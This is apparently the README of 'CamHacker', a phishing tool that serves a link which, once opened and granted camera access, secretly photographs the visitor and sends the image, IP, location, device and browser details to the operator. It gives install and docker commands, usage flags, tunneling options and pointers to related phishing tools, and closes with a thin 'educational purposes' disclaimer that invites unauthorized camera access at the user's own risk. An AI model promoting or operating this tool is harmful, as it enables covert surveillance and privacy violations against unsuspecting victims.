CamHacker is a phishing tool. It will generate a link. If anyone opens the link and permits camera access, his/her photo will be captured and sent to you!
This project is now a part of MaxPhisher. Further bug fixes and feature addition will be available in that
git clone
cd CamHacker
For termux, use additional command termux-setup-storage
wget && bash
sudo docker pull kasroudra/camhacker
sudo docker run --rm -it --name camhacker kasroudra/camhacker
sudo docker cp camhacker:/CamHacker imgfiles
[Run this on another terminal to copy received image from docker to imgfiles folder keeping container open]
Usage: bash [-h] [-o OPTION] [-p PORT] [-t TUNNELER] [-u] [-nu]
-h, --help Show this help message and exit
-o OPTION, --option OPTION Index of the template
-p PORT, --port PORT Port of CamHacker's Server (Default: 8080)
-t TUNNELER, --tunneler TUNNELER Name of the tunneler for url shortening (Default: cloudflared)
-d DIRECTORY, --directory DIRECTORY Directory where images will be saved
--update(-u), --no-update (-nu) Check for update (Default: true)
- Three Templates
- Get IP, Location, Device type and Browser
- Concurrent double tunneling (Cloudflared and Loclx)
- Choose where to save images(custom directory)
- Error Diagnoser
- Argument support for templates, tunnelers and directory
- PyPhisher for login phishing
- VidPhisher for video phishing
All of the necessary dependencies will be installed automatically in first run!
You need to use good (not mini version like opera mini) browsers as chrome/brave/mozilla to get image captured. Although some browsers can block this CamHacker, however it works in most devices.
Thanks to Noob-Hackers, Technochip and Linux Choice for their open source codes!
This tool is developed for educational purposes. Here it demonstrates how camera phishing works. If anybody wants to gain unauthorized access to someones camera, he/she may try out this at his/her own risk. You have your own responsibilities and you are liable to any damage or violation of laws by this tool. The author is not responsible for any misuse of CamHacker!